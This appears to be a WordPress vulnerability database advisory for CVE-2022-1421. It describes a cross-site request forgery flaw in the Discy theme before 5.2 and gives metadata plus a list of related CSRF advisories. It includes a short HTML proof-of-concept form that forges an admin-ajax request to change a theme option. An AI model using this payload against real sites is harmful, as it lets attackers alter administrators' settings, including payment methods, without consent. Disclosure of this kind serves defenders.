Discy < 5.2 – Settings Update via CSRF | CVE 2022-1421 | Theme Vulnerabilities

Description

The theme lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary plugin's settings including payment methods via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_update_options">
      <input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
      <input type="submit" value="Submit request">
    </form>
  </body>
</html>

Affects Themes

Fixed in 5.2

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bibek Neupane

Submitter

Bibek Neupane

Submitter twitter

Verified

Yes

WPVDB ID

a7a24e8e-9056-4967-bcad-b96cc0c5b249

Timeline

Publicly Published

2022-05-16 (about 3 years ago)

Added

2022-05-16 (about 3 years ago)

Last Updated

2022-05-17 (about 3 years ago)

Other

Published

Title

Published

2025-10-22

Title

Listify <= 3.2.5 - Cross-Site Request Forgery

Published

2025-08-25

Title

Post Type Converter <= 0.6 - Cross-Site Request Forgery

Published

2025-12-04

Title

SMTP Mail <= 1.3.49 - Cross-Site Request Forgery

Published

2014-08-01

Title

Social Sharing Toolkit 2.1.1 - Setting Manipulation CSRF

Published

2019-06-27

Title

ACF Better Search <= 3.3.0 - Cross-Site Request Forgery (CSRF)